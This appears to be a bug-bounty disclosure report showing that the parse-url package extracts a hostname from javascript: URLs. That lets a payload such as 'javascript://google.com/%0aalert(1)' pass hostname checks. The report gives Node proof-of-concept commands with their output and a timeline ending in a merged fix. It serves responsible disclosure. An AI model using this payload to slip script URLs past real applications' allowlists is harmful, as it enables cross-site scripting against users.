hostname spoofing via javascript in ionicabizau/parse-url

Valid

Reported on

Mar 4th 2022


Description

Using parse-url for a security check on a URL is dangerous, because the hostname can be spoofed through the javascript: scheme. The same issue affected url.parse() in Node.js in 2018; Node.js acknowledged it as a vulnerability and patched it, and a CVE was issued after the security release.

sh-3.2$ node -e 'console.log(require("url").parse("javascript://google.com/%0aalert(1)"))'
Url {
  protocol: 'javascript:',
  slashes: null,
  auth: null,
  host: null,
  port: null,
  hostname: null,
  hash: null,
  search: null,
  query: null,
  pathname: '//google.com/%0aalert(1)',
  path: '//google.com/%0aalert(1)',
  href: 'javascript://google.com/%0aalert(1)'
}
sh-3.2$

The output above comes from url.parse() in Node.js: for a javascript: URL, what looks like a hostname is treated as part of the path, and hostname stays null.

Proof of Concept

sh-3.2$ node -e 'const parseUrl = require("parse-url"); console.log(parseUrl("javascript://google.com/%0aalert(1)"))'
{
  protocols: [ 'javascript' ],
  protocol: 'javascript',
  port: null,
  resource: 'google.com',
  user: '',
  pathname: '/%0aalert(1)',
  hash: '',
  search: '',
  href: 'javascript://google.com/%0aalert(1)',
  query: [Object: null prototype] {}
}
sh-3.2$

parse-url, unlike Node.js, extracts google.com as the resource (hostname) of this javascript: URL, so a check on the hostname alone would accept it.

Refer to CVE-2018-12123

We are processing your report and will contact the ionicabizau/parse-url team within 24 hours. 5 months ago
Ionică Bizău (Johnny B.) validated this vulnerability 5 months ago
Pocas has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the ionicabizau/parse-url team. We will try again in 7 days. 5 months ago
We have sent a second fix follow up to the ionicabizau/parse-url team. We will try again in 10 days. 5 months ago
We have sent a third and final fix follow up to the ionicabizau/parse-url team. This report is now considered stale. 4 months ago
Ionică Bizău (Johnny B.) confirmed that a fix has been merged on 21c72a a month ago
Ionică Bizău (Johnny B.) has been awarded the fix bounty